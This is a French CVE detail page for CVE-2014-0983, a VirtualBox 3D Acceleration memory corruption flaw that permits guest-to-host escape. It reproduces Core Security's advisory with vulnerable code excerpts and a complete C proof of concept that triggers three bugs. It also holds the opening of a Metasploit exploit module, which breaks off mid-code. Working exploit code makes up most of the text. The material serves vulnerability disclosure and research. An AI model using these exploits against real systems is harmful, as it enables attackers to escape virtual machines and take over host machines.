CVE-2014-0983 : Détail

CVE-2014-0983

2.41%V3
Local
2014-03-28
20h00 +00:00
2018-10-09
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple array index errors in programs that are automatically generated by VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py in Oracle VirtualBox 4.2.x through 4.2.20 and 4.3.x before 4.3.8, when using 3D Acceleration, allow local guest OS users to execute arbitrary code on the Chromium server via certain CR_MESSAGE_OPCODES messages with a crafted index, which are not properly handled by the (1) CR_VERTEXATTRIB4NUBARB_OPCODE to the crServerDispatchVertexAttrib4NubARB function, (2) CR_VERTEXATTRIB1DARB_OPCODE to the crServerDispatchVertexAttrib1dARB function, (3) CR_VERTEXATTRIB1FARB_OPCODE to the crServerDispatchVertexAttrib1fARB function, (4) CR_VERTEXATTRIB1SARB_OPCODE to the crServerDispatchVertexAttrib1sARB function, (5) CR_VERTEXATTRIB2DARB_OPCODE to the crServerDispatchVertexAttrib2dARB function, (6) CR_VERTEXATTRIB2FARB_OPCODE to the crServerDispatchVertexAttrib2fARB function, (7) CR_VERTEXATTRIB2SARB_OPCODE to the crServerDispatchVertexAttrib2sARB function, (8) CR_VERTEXATTRIB3DARB_OPCODE to the crServerDispatchVertexAttrib3dARB function, (9) CR_VERTEXATTRIB3FARB_OPCODE to the crServerDispatchVertexAttrib3fARB function, (10) CR_VERTEXATTRIB3SARB_OPCODE to the crServerDispatchVertexAttrib3sARB function, (11) CR_VERTEXATTRIB4DARB_OPCODE to the crServerDispatchVertexAttrib4dARB function, (12) CR_VERTEXATTRIB4FARB_OPCODE to the crServerDispatchVertexAttrib4fARB function, and (13) CR_VERTEXATTRIB4SARB_OPCODE to the crServerDispatchVertexAttrib4sARB function.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.9 AV:L/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 32208

Date de publication : 2014-03-11 23h00 +00:00
Auteur : Core Security
EDB Vérifié : Yes

Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities 1. *Advisory Information* Title: Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities Advisory ID: CORE-2014-0002 Advisory URL: http://www.coresecurity.com/content/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities Date published: 2014-03-11 Date of last update: 2014-03-11 Vendors contacted: Oracle Release mode: User release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Improper Validation of Array Index [CWE-129], Improper Validation of Array Index [CWE-129] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2014-0981, CVE-2014-0982, CVE-2014-0983 3. *Vulnerability Description* VirtualBox is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use. VirtualBox provides -among many other features- 3D Acceleration for guest machines through its Guest Additions. This feature allows guest machines to use the host machine's GPU to render 3D graphics based on then OpenGL or Direct3D APIs. Multiple memory corruption vulnerabilities have been found in the code that implements 3D Acceleration for OpenGL graphics in Oracle VirtualBox. These vulnerabilities could allow an attacker who is already running code within a Guest OS to escape from the virtual machine and execute arbitrary code on the Host OS. 4. *Vulnerable packages* . Oracle VirtualBox v4.2.20 and earlier. . Oracle VirtualBox v4.3.6 and earlier. . Other versions may be affected too but they were no checked. 5. *Non-vulnerable packages* . Oracle VirtualBox v4.3.8. 6. *Credits* This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Andres Blanco from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* VirtualBox makes use of the *Chromium*[1] open-source library (not to be confused with the open-source web browser) in order to provide 3D Acceleration for OpenGL graphics. Chromium provides remote rendering of OpenGL graphics through a client/server model, in which a client (i.e. an OpenGL application) delegates the rendering to the server, which has access to 3D-capable hardware. When 3D Acceleration is enabled in VirtualBox, OpenGL apps running within a Guest OS (acting as Chromium clients) will send rendering commands to the Chromium server, which is running in the context of the hypervisor in the Host OS. The code that handles OpenGL rendering commands on the Host side is prone to multiple memory corruption vulnerabilities, as described below. 7.1. *VirtualBox crNetRecvReadback Memory Corruption Vulnerability* [CVE-2014-0981] The first vulnerability is caused by a *design flaw* in Chromium. The Chromium server makes use of "*network pointers*". As defined in Chromium's documentation, '"Network pointers are simply memory addresses that reside on another machine.[...] The networking layer will then take care of writing the payload data to the specified address."'[2] So the Chromium's server code, which runs in the context of the VirtualBox hypervisor in the Host OS, provides a write-what-where memory corruption primitive *by design*, which can be exploited to corrupt arbitrary memory addresses with arbitrary data in the hypervisor process from within a virtual machine. This is the code of the vulnerable function [file 'src/VBox/GuestHost/OpenGL/util/net.c'], which can be reached by sending a 'CR_MESSAGE_READBACK' message to the 'VBoxSharedCrOpenGL' service: /----- /** * Called by the main receive function when we get a CR_MESSAGE_READBACK * message. Used to implement glGet*() functions. */ static void crNetRecvReadback( CRMessageReadback *rb, unsigned int len ) { /* minus the header, the destination pointer, * *and* the implicit writeback pointer at the head. */ int payload_len = len - sizeof( *rb ); int *writeback; void *dest_ptr; crMemcpy( &writeback, &(rb->writeback_ptr), sizeof( writeback ) ); crMemcpy( &dest_ptr, &(rb->readback_ptr), sizeof( dest_ptr ) ); (*writeback)--; crMemcpy( dest_ptr, ((char *)rb) + sizeof(*rb), payload_len ); } -----/ Note that 'rb' points to a 'CRMessageReadback' structure, which is fully controlled by the application running inside a VM that is sending OpenGL rendering commands to the Host side. The 'len' parameter is also fully controlled from the Guest side, so it's possible to: 1. decrement the value stored at any memory address within the address space of the hypervisor. 2. write any data to any memory address within the address space of the hypervisor. 7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability* [CVE-2014-0982] The second vulnerability is closely related to the first one, and it's also caused by Chromium's "*network pointers*". This is the code of the vulnerable function [file 'src/VBox/GuestHost/OpenGL/util/net.c'], which can be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the 'VBoxSharedCrOpenGL' service: /----- /** * Called by the main receive function when we get a CR_MESSAGE_WRITEBACK * message. Writeback is used to implement glGet*() functions. */ static void crNetRecvWriteback( CRMessageWriteback *wb ) { int *writeback; crMemcpy( &writeback, &(wb->writeback_ptr), sizeof( writeback ) ); (*writeback)--; } -----/ Note that 'rb' points to a 'CRMessageWriteback' structure, which is fully controlled by the application running inside a VM that is sending OpenGL rendering commands to the Host side, so it's possible to decrement the value stored at any memory address within the address space of the hypervisor. 7.3. *VirtualBox crServerDispatchVertexAttrib4NubARB Memory Corruption Vulnerability* [CVE-2014-0983] When an OpenGL application running inside a VM sends rendering commands (in the form of opcodes + data for those opcodes) through a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in the 'crUnpack' function. The code for the 'crUnpack' function is automatically generated by the Python script located at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'. This function is basically a big switch statement dispatching different functions according to the opcode being processed: /----- void crUnpack( const void *data, const void *opcodes, unsigned int num_opcodes, SPUDispatchTable *table ) { [...] unpack_opcodes = (const unsigned char *)opcodes; cr_unpackData = (const unsigned char *)data; for (i = 0 ; i < num_opcodes ; i++) { /*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/ switch( *unpack_opcodes ) { case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break; case CR_ARRAYELEMENT_OPCODE: crUnpackArrayElement(); break; case CR_BEGIN_OPCODE: crUnpackBegin(); break; [...] -----/ When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE' ('0xEA'), the function to be invoked is 'crUnpackVertexAttrib4NubARB': /----- [...] case CR_VERTEXATTRIB4NUBARB_OPCODE: crUnpackVertexAttrib4NubARB(); break; [...] -----/ The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the opcode data sent by the Chromium client, and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5 values as arguments: /----- static void crUnpackVertexAttrib4NubARB(void) { GLuint index = READ_DATA( 0, GLuint ); GLubyte x = READ_DATA( 4, GLubyte ); GLubyte y = READ_DATA( 5, GLubyte ); GLubyte z = READ_DATA( 6, GLubyte ); GLubyte w = READ_DATA( 7, GLubyte ); cr_unpackDispatch.VertexAttrib4NubARB( index, x, y, z, w ); INCR_DATA_PTR( 8 ); } -----/ 'VertexAttrib4NubARB' is a function pointer in a dispatch table, and points to the function 'crServerDispatchVertexAttrib4NubARB', whose code is generated by the Python script located at 'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py': /----- void SERVER_DISPATCH_APIENTRY crServerDispatchVertexAttrib4NubARB( GLuint index, GLubyte x, GLubyte y, GLubyte z, GLubyte w ) { cr_server.head_spu->dispatch_table.VertexAttrib4NubARB( index, x, y, z, w ); cr_server.current.c.vertexAttrib.ub4[index] = cr_unpackData; } -----/ Note that the 'index' parameter, which is a 4-byte integer coming from an untrusted source (the opcode data sent by the Chromium client from the VM), is used as an index within the 'cr_server.current.c.vertexAttrib.ub4' array in order to write 'cr_unpackData' (which is a pointer to the attacker-controlled opcode data), without validating that the index is within the bounds of the array. This issue can be leveraged to corrupt arbitrary memory with a pointer to attacker-controlled data. Also note that *the same vulnerability affects several functions* whose code is generated by the 'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py' Python script: /----- Opcode CR_VERTEXATTRIB1DARB_OPCODE [0xDE] -> function crServerDispatchVertexAttrib1dARB Opcode CR_VERTEXATTRIB1FARB_OPCODE [0xDF] -> function crServerDispatchVertexAttrib1fARB Opcode CR_VERTEXATTRIB1SARB_OPCODE [0xE0] -> function crServerDispatchVertexAttrib1sARB Opcode CR_VERTEXATTRIB2DARB_OPCODE [0xE1] -> function crServerDispatchVertexAttrib2dARB Opcode CR_VERTEXATTRIB2FARB_OPCODE [0xE2] -> function crServerDispatchVertexAttrib2fARB Opcode CR_VERTEXATTRIB2SARB_OPCODE [0xE3] -> function crServerDispatchVertexAttrib2sARB Opcode CR_VERTEXATTRIB3DARB_OPCODE [0xE4] -> function crServerDispatchVertexAttrib3dARB Opcode CR_VERTEXATTRIB3FARB_OPCODE [0xE5] -> function crServerDispatchVertexAttrib3fARB Opcode CR_VERTEXATTRIB3SARB_OPCODE [0xE6] -> function crServerDispatchVertexAttrib3sARB Opcode CR_VERTEXATTRIB4NUBARB_OPCODE [0xEA] -> function crServerDispatchVertexAttrib4NubARB Opcode CR_VERTEXATTRIB4DARB_OPCODE [0xEF] -> function crServerDispatchVertexAttrib4dARB Opcode CR_VERTEXATTRIB4FARB_OPCODE [0xF0] -> function crServerDispatchVertexAttrib4fARB Opcode CR_VERTEXATTRIB4SARB_OPCODE [0xF2] -> function crServerDispatchVertexAttrib4sARB -----/ 7.4. *Proof of Concept* /----- #include "stdafx.h" #include <windows.h> #include "vboxguest2.h" #include "vboxguest.h" #include "err.h" #include "vboxcropenglsvc.h" #include "cr_protocol.h" #define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest" HANDLE open_device(){ HANDLE hDevice = CreateFile(VBOXGUEST_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE){ printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME); exit(EXIT_FAILURE); } printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice); return hDevice; } uint32_t do_connect(HANDLE hDevice){ VBoxGuestHGCMConnectInfo info; DWORD cbReturned = 0; BOOL rc; memset(&info, 0, sizeof(info)); info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing; strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL"); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function do_connect()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (info.result == VINF_SUCCESS){ printf("HGCM connect was successful: client id =0x%x\n", info.u32ClientID); } else{ //If 3D Acceleration is disabled, info.result value will be -2900. printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration enabled??)\n", info.result); exit(EXIT_FAILURE); } return info.u32ClientID; } void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){ BOOL rc; VBoxGuestHGCMDisconnectInfo info; DWORD cbReturned = 0; memset(&info, 0, sizeof(info)); info.u32ClientID = u32ClientID; printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n"); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT, &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function do_disconnect()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (info.result == VINF_SUCCESS){ printf("HGCM disconnect was successful.\n"); } else{ printf("[-] HGCM disconnect failed. Result: %d\n", info.result); exit(EXIT_FAILURE); } } void set_version(HANDLE hDevice, uint32_t u32ClientID){ CRVBOXHGCMSETVERSION parms; DWORD cbReturned = 0; BOOL rc; memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; parms.hdr.u32ClientID = u32ClientID; parms.hdr.u32Function = SHCRGL_GUEST_FN_SET_VERSION; parms.hdr.cParms = SHCRGL_CPARMS_SET_VERSION; parms.vMajor.type = VMMDevHGCMParmType_32bit; parms.vMajor.u.value32 = CR_PROTOCOL_VERSION_MAJOR; parms.vMinor.type = VMMDevHGCMParmType_32bit; parms.vMinor.u.value32 = CR_PROTOCOL_VERSION_MINOR; rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms, sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function set_version()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ printf("Host didn't accept our version.\n"); exit(EXIT_FAILURE); } } void set_pid(HANDLE hDevice, uint32_t u32ClientID){ CRVBOXHGCMSETPID parms; DWORD cbReturned = 0; BOOL rc; memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; parms.hdr.u32ClientID = u32ClientID; parms.hdr.u32Function = SHCRGL_GUEST_FN_SET_PID; parms.hdr.cParms = SHCRGL_CPARMS_SET_PID; parms.u64PID.type = VMMDevHGCMParmType_64bit; parms.u64PID.u.value64 = GetCurrentProcessId(); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms, sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function set_pid()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ printf("Host didn't like our PID %d\n", GetCurrentProcessId()); exit(EXIT_FAILURE); } } /* Triggers the vulnerability in the crNetRecvReadback function. */ void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){ CRVBOXHGCMINJECT parms; DWORD cbReturned = 0; BOOL rc; char mybuf[1024]; CRMessageReadback msg; memset(&msg, 0, sizeof(msg)); msg.header.type = CR_MESSAGE_READBACK; msg.header.conn_id = 0x8899; //This address will be decremented by 1 *((DWORD *)&msg.writeback_ptr.ptrSize) = 0x88888888; //Destination address for the memcpy *((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999; memcpy(&mybuf, &msg, sizeof(msg)); strcpy(mybuf + sizeof(msg), "Hi hypervisor!"); memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; parms.hdr.u32ClientID = u32ClientID; parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT; parms.hdr.cParms = SHCRGL_CPARMS_INJECT; parms.u32ClientID.type = VMMDevHGCMParmType_32bit; parms.u32ClientID.u.value32 = u32ClientID; parms.pBuffer.type = VMMDevHGCMParmType_LinAddr_In; parms.pBuffer.u.Pointer.size = sizeof(mybuf); //size for the memcpy: sizeof(mybuf) - 0x18 parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf; rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms, sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function trigger_message_readback()!. LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ printf("HGCM Call failed. Result: %d\n", parms.hdr.result); exit(EXIT_FAILURE); } } /* Triggers the vulnerability in the crNetRecvWriteback function. */ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){ CRVBOXHGCMINJECT parms; DWORD cbReturned = 0; BOOL rc; char mybuf[512]; CRMessage msg; memset(&mybuf, 0, sizeof(mybuf)); memset(&msg, 0, sizeof(msg)); msg.writeback.header.type = CR_MESSAGE_WRITEBACK; msg.writeback.header.conn_id = 0x8899; //This address will be decremented by 1 *((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD; memcpy(&mybuf, &msg, sizeof(msg)); strcpy(mybuf + sizeof(msg), "dummy"); memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; parms.hdr.u32ClientID = u32ClientID; parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT; parms.hdr.cParms = SHCRGL_CPARMS_INJECT; parms.u32ClientID.type = VMMDevHGCMParmType_32bit; parms.u32ClientID.u.value32 = u32ClientID; parms.pBuffer.type = VMMDevHGCMParmType_LinAddr_In; parms.pBuffer.u.Pointer.size = sizeof(mybuf); parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf; rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms, sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function trigger_message_writeback()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ printf("HGCM Call failed. Result: %d\n", parms.hdr.result); exit(EXIT_FAILURE); } } /* Triggers the vulnerability in the crServerDispatchVertexAttrib4NubARB function. */ void trigger_opcode_0xea(HANDLE hDevice, uint32_t u32ClientID){ CRVBOXHGCMINJECT parms; char mybuf[0x10f0]; DWORD cbReturned = 0; BOOL rc; unsigned char opcodes[] = {0xFF, 0xea, 0x02, 0xf7}; DWORD opcode_data[] = {0x08, //Advance 8 bytes after executing opcode 0xF7, subopcode 0x30 0x30, //Subopcode for opcode 0xF7 0x331, //Argument for opcode 0x02 0xFFFCFA4B, //This is the negative index used to trigger the memory corruption 0x41414141}; //Junk CRMessageOpcodes msg_opcodes; memset(&mybuf, 0, sizeof(mybuf)); memset(&msg_opcodes, 0, sizeof(msg_opcodes)); msg_opcodes.header.conn_id = 0x8899; msg_opcodes.header.type = CR_MESSAGE_OPCODES; msg_opcodes.numOpcodes = sizeof(opcodes); char *offset = (char *)&mybuf; memcpy(offset, &msg_opcodes, sizeof(msg_opcodes)); offset += sizeof(msg_opcodes); /*----- Opcodes -----*/ memcpy(offset, &opcodes, sizeof(opcodes)); offset += sizeof(opcodes); /*----- data for the opcodes -----*/ memcpy(offset, &opcode_data, sizeof(opcode_data)); offset += sizeof(opcode_data); memset(&parms, 0, sizeof(parms)); parms.hdr.result = 0; parms.hdr.u32ClientID = u32ClientID; parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT; parms.hdr.cParms = SHCRGL_CPARMS_INJECT; parms.u32ClientID.type = VMMDevHGCMParmType_32bit; parms.u32ClientID.u.value32 = u32ClientID; parms.pBuffer.type = VMMDevHGCMParmType_LinAddr_In; parms.pBuffer.u.Pointer.size = sizeof(mybuf); parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf; rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms, sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ printf("ERROR: DeviceIoControl failed in function trigger_opcode_0xea()! LastError: %d\n", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); } else{ printf("HGCM Call failed. Result: %d\n", parms.hdr.result); exit(EXIT_FAILURE); } } void poc(int option){ HANDLE hDevice; uint32_t u32ClientID; /* Connect to the VBoxSharedCrOpenGL service */ hDevice = open_device(); u32ClientID = do_connect(hDevice); /* Set version and PID */ set_version(hDevice, u32ClientID); set_pid(hDevice, u32ClientID); switch (option){ case 1: printf("[1] triggering the first bug...\n"); trigger_message_readback(hDevice, u32ClientID); break; case 2: printf("[2] triggering the second bug...\n"); trigger_message_writeback(hDevice, u32ClientID); break; case 3: printf("[3] triggering the third bug...\n"); trigger_opcode_0xea(hDevice, u32ClientID); break; default: printf("[!] Unknown option %d.\n", option); } /* Disconnect from the VBoxSharedCrOpenGL service */ do_disconnect(hDevice, u32ClientID); CloseHandle(hDevice); } int main(int argc, char* argv[]) { if (argc < 2){ printf("Usage: %s <option number>\n\n", argv[0]); printf("* Option 1: trigger the vulnerability in the crNetRecvReadback function.\n"); printf("* Option 2: trigger the vulnerability in the crNetRecvWriteback function.\n"); printf("* Option 3: trigger the vulnerability in the crServerDispatchVertexAttrib4NubARB function.\n"); exit(1); } poc(atoi(argv[1])); } -----/ 8. *Report Timeline* . 2014-02-11: Core Security Technologies notifies the VirtualBox team of the vulnerability. Publication date is set for March 4th, 2014. . 2014-02-12: Vendor acknowledges the receipt of the information. Vendor asks to coordinate the release for April 15, 2014 which is the earliest possible date for publishing this issue from Oracle. . 2014-02-12: Core schedules the advisory publication for April 15, 2014 and asks for regular status reports. . 2014-03-04: First release date missed. . 2014-03-07: Vendor releases fixes of some affected versions [3][4]. . 2014-03-07: Core notifies that, given that some patches were disclosed, the advisory will we released as user release ASAP. . 2014-03-07: Vendor asks for delaying the advisory publication given that some versions are still vulnerable. . 2014-03-10: Core notifies that the advisory is going to be published because once the fixes have been made public the vulnerability is public as well. . 2014-03-10: Vendor notifies that they will not include credit to Core researchers given that the advisory is being published before a fix is available to all affected versions. . 2014-03-11: Advisory CORE-2014-0002 published as user release. 9. *References* [1] http://chromium.sourceforge.net/ [2] http://chromium.sourceforge.net/doc/howitworks.html [3] https://www.virtualbox.org/changeset/50441/vbox [4] https://www.virtualbox.org/changeset/50437/vbox 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2014 Core Security Technologies and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Exploit Database EDB-ID : 34334

Date de publication : 2014-08-13 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' INVALID_HANDLE_VALUE = 0xFFFFFFFF # VBOX HGCM protocol constants VBOXGUEST_IOCTL_HGCM_CONNECT = 2269248 VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252 VBOXGUEST_IOCTL_HGCM_CALL = 2269256 CONNECT_MSG_SIZE = 140 DISCONNECT_MSG_SIZE = 8 SET_VERSION_MSG_SIZE = 40 SET_PID_MSG_SIZE = 28 CALL_EA_MSG_SIZE = 40 VERR_WRONG_ORDER = 0xffffffea SHCRGL_GUEST_FN_SET_PID = 12 SHCRGL_CPARMS_SET_PID = 1 SHCRGL_GUEST_FN_SET_VERSION = 6 SHCRGL_CPARMS_SET_VERSION = 2 SHCRGL_GUEST_FN_INJECT = 9 SHCRGL_CPARMS_INJECT = 2 CR_PROTOCOL_VERSION_MAJOR = 9 CR_PROTOCOL_VERSION_MINOR = 1 VMM_DEV_HGCM_PARM_TYPE_32_BIT = 1 VMM_DEV_HGCM_PARM_TYPE_64_BIT = 2 VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5 def initialize(info={}) super(update_info(info, { 'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape', 'Description' => %q{ This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted of rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, 'License' => MSF_LICENSE, 'Author' => [ 'Francisco Falcon', # Vulnerability Discovery and PoC 'Florian Ledoux', # Win 8 64 bits exploitation analysis 'juan vazquez' # MSF module ], 'Arch' => ARCH_X86_64, 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)', { :messages => :target_virtualbox_436_win7_64 } ] ], 'Payload' => { 'Space' => 7000, 'DisableNops' => true }, 'References' => [ ['CVE', '2014-0983'], ['BID', '66133'], ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'], ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'], ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php'] ], 'DisclosureDate' => 'Mar 11 2014', 'DefaultTarget' => 0 })) end def open_device r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0) handle = r['return'] if handle == INVALID_HANDLE_VALUE return nil end return handle end def send_ioctl(ioctl, msg) result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "") if result["GetLastError"] != 0 unless result["ErrorMessage"].blank? vprint_error("#{result["ErrorMessage"]}") end return nil end unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length unless result["ErrorMessage"].blank? vprint_error("#{result["ErrorMessage"]}") end return nil end unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0 unless result["ErrorMessage"].blank? vprint_error("#{result["ErrorMessage"]}") end return nil end result end def connect msg = "\x00" * CONNECT_MSG_SIZE msg[4, 4] = [2].pack("V") msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL" result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg) if result.nil? return result end client_id = result["lpOutBuffer"][136, 4].unpack("V").first client_id end def disconnect msg = "\x00" * DISCONNECT_MSG_SIZE msg[4, 4] = [@client_id].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg) result end def set_pid(pid) msg = "\x00" * SET_PID_MSG_SIZE msg[0, 4] = [VERR_WRONG_ORDER].pack("V") msg[4, 4] = [@client_id].pack("V") # u32ClientID msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V") msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V") msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V") msg[20, 4] = [pid].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) result end def set_version msg = "\x00" * SET_VERSION_MSG_SIZE msg[0, 4] = [VERR_WRONG_ORDER].pack("V") msg[4, 4] = [@client_id].pack("V") # u32ClientID msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V") msg[12, 4] = 